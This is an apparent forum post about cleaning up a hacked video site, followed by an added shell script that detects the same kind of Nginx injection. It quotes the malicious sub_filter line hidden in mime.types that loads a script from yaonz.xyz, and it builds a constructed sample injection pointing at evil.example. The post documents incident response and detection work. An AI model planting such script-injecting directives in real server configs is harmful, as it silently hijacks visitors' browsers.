My video site was injected with malware!!
My video site was injected with malware!! http://www.yaonz.xyz/moment.js is the JS file; when the site is visited from a phone it redirects to porn.
This is how I resolved it.
1. Check scheduled tasks: in SSH, run crontab -l. Attackers often set a task that checks every minute and rewrites the trojan.
The output of crontab -l was:
[root@kvm-2hk8820 ~]# crontab -l
*/3 * * * * /www/server/cron/1231997074b0061801f09125578f4e6e >> /www/server/cron/1231997074b0061801f09125578f4e6e.log 2>&1
14 13 * * * /www/server/cron/3ab48c27ec99cb9787749c362afae517 >> /www/server/cron/3ab48c27ec99cb9787749c362afae517.log 2>&1
*/20 * * * * /www/server/cron/c6a2b972f277720e7c28719fc527ab1b >> /www/server/cron/c6a2b972f277720e7c28719fc527ab1b.log 2>&1
30 1 */3 * * /www/server/cron/938609c585c5f17f1d3b4d011024ee0e >> /www/server/cron/938609c585c5f17f1d3b4d011024ee0e.log 2>&1
*/10 * * * * /www/server/cron/3991490181e1ecdc068158ed07cb99e2 >> /www/server/cron/3991490181e1ecdc068158ed07cb99e2.log 2>&1
30 3 * * * /www/server/cron/19342377d9f22f32807eea11ad3eb9f9 >> /www/server/cron/19342377d9f22f32807eea11ad3eb9f9.log 2>&1
10 4 * * * /www/server/cron/6593b58256cfbd723ff01d93b508a246 >> /www/server/cron/6593b58256cfbd723ff01d93b508a246.log 2>&1
30 4 * * * /www/server/cron/7fa1a1f2d91a436744562d1df1ae7164 >> /www/server/cron/7fa1a1f2d91a436744562d1df1ae7164.log 2>&1
20 * * * * /www/server/cron/f5ce67a3afda0383c6ec776a6b5f4d01 >> /www/server/cron/f5ce67a3afda0383c6ec776a6b5f4d01.log 2>&1
45 * * * * /www/server/cron/fbbf688a3c5b437f64ae91588b9a2ce2 >> /www/server/cron/fbbf688a3c5b437f64ae91588b9a2ce2.log 2>&1
*/5 * * * * /www/server/cron/ba5bf005b54fe399295df53fd4ddea93 >> /www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log 2>&1
16 * * * * /www/server/cron/523d24d6555b22663d87b4ea09779dbf >> /www/server/cron/523d24d6555b22663d87b4ea09779dbf.log 2>&1
12 * * * * /www/server/cron/c8fb9f932ba39c2c0897b9cfce7b2c0f >> /www/server/cron/c8fb9f932ba39c2c0897b9cfce7b2c0f.log 2>&1
20 2 * * * /www/server/cron/0193896471cf1065d7693b556b9d71db >> /www/server/cron/0193896471cf1065d7693b556b9d71db.log 2>&1
42 1 * * * /www/server/cron/ced223288914d9300c9fd3ced7e63445 >> /www/server/cron/ced223288914d9300c9fd3ced7e63445.log 2>&1
32 1 * * * /www/server/cron/1ef530e6a894a434e5391324584bae54 >> /www/server/cron/1ef530e6a894a434e5391324584bae54.log 2>&1
32 * * * * /www/server/cron/16d9cb0b684b9caff98d2e548b2dffd7 >> /www/server/cron/16d9cb0b684b9caff98d2e548b2dffd7.log 2>&1
4 * * * * /www/server/cron/ff09cf4ddd83652c67871b40ce49eebf >> /www/server/cron/ff09cf4ddd83652c67871b40ce49eebf.log 2>&1
30 * * * * /www/server/cron/de45340d07d40cab297153d42edbecf7 >> /www/server/cron/de45340d07d40cab297153d42edbecf7.log 2>&1
1 */2 * * * /www/server/cron/ae3ba4efd2369aff994c98ec34f1c97c >> /www/server/cron/ae3ba4efd2369aff994c98ec34f1c97c.log 2>&1
*/5 * * * * /www/server/cron/f865a42229ab377f379b325640764e3b >> /www/server/cron/f865a42229ab377f379b325640764e3b.log 2>&1
50 3 * * * /www/server/cron/ac91f3ba9a7a89ced7f445f6870fc4fb >> /www/server/cron/ac91f3ba9a7a89ced7f445f6870fc4fb.log 2>&1
10 1 * * * /www/server/cron/efaafce13d0f8dc53407b35c733cc10d >> /www/server/cron/efaafce13d0f8dc53407b35c733cc10d.log 2>&1
40 2 * * 1 /www/server/cron/ae4fbb6ad62403fcf6c0a07cd789247c >> /www/server/cron/ae4fbb6ad62403fcf6c0a07cd789247c.log 2>&1
13 1 * * * /www/server/cron/3fe42ff05568b9cb1752cd1ed6875aa0 >> /www/server/cron/3fe42ff05568b9cb1752cd1ed6875aa0.log 2>&1
2. Find the tasks that contain the malicious code
grep -r "yaonz.xyz" /www/server/cron/
Output (partial excerpt):
/www/server/cron/3991490181e1ecdc068158ed07cb99e2.log:<script src="//www.yaonz.xyz/moment.js"></script>
/www/server/cron/ba5bf005b54fe399295df53fd4ddea93.log:<head><title>502 Bad Gateway</title><script src="//www.yaonz.xyz/moment.js"></script>
Pinpointing the source: the grep results show that the hijack script was generated by the two scheduled tasks 3991490181e1ecdc068158ed07cb99e2 and ba5bf005b54fe399295df53fd4ddea93.
3. Delete the malicious scheduled tasks immediately
rm -f /www/server/cron/3991490181e1ecdc068158ed07cb99e2
rm -f /www/server/cron/ba5bf005b54fe399295df53fd4ddea93
rm -f /www/server/cron/*.log
4. With the scheduled write tasks deleted, find where the actual code lives
Search the entire Nginx and firewall directories:
grep -rn "yaonz" /www/server/panel/plugin/waf/
grep -rn "yaonz" /www/server/nginx/
Output:
[root@kvm-2hk8820 ~]# grep -rn "yaonz" /www/server/panel/plugin/waf/
grep: /www/server/panel/plugin/waf/: No such file or directory
[root@kvm-2hk8820 ~]# grep -rn "yaonz" /www/server/nginx/
/www/server/nginx/conf/mime.types:101:sub_filter '</head>' '<script src="//www.yaonz.xyz/moment.js"></script>\r\n</head>';
[root@kvm-2hk8820 ~]#
At this point the file path had turned up.
Open /www/server/nginx/conf/mime.types and delete that entire last line. Problem solved.
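The injection above worked by hiding a sub_filter directive in a file (mime.types) that never normally carries one. As an added example, not part of the original post, the following script scans an Nginx config tree for any sub_filter that inserts a <script> tag pointing at another host, and separately flags sub_filter appearing in files where it does not belong. The sample config tree, the host evil.example and all paths are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post). Detects sub_filter-based script
# injection in an Nginx config tree; all sample data below is constructed.

# find_injected_subfilter DIR
# Prints "file:line:content" for every sub_filter that inserts a <script src=...>
# whose source is on another host (protocol-relative "//" or http(s)://).
find_injected_subfilter() {
    grep -rn -E "sub_filter[[:space:]]+.*<script[^>]+src=[\"']?(https?:)?//" "$1" 2>/dev/null
}

# find_subfilter_in_unusual_files CONFDIR
# Lists include files (mime.types, *_params) that carry a sub_filter at all;
# legitimate deployments keep that directive in server/location blocks.
find_subfilter_in_unusual_files() {
    grep -l "sub_filter" "$1"/mime.types "$1"/fastcgi_params \
        "$1"/scgi_params "$1"/uwsgi_params 2>/dev/null
}

# tree_is_clean DIR -> exit 0 if no injecting sub_filter was found, 1 otherwise.
tree_is_clean() {
    [ -z "$(find_injected_subfilter "$1")" ]
}

# make_sample_tree -> prints the path of a constructed config tree containing
# one injected line (same shape as the one found in the post, constructed host)
# and one harmless same-site sub_filter that must not be flagged.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/conf"
    cat > "$d/conf/mime.types" <<'EOF'
types {
    text/html html htm;
}
sub_filter '</head>' '<script src="//evil.example/moment.js"></script>\r\n</head>';
EOF
    cat > "$d/conf/site.conf" <<'EOF'
server {
    sub_filter "http://old.example.internal" "https://new.example.internal";
}
EOF
    echo "$d"
}

# Stand-alone run: build the sample tree and report findings.
SAMPLE=$(make_sample_tree)
find_injected_subfilter "$SAMPLE"
find_subfilter_in_unusual_files "$SAMPLE/conf"
```

Point the two find_ functions at /www/server/nginx/conf (or whatever directory `nginx -T` reports) instead of the sample tree to audit a real server.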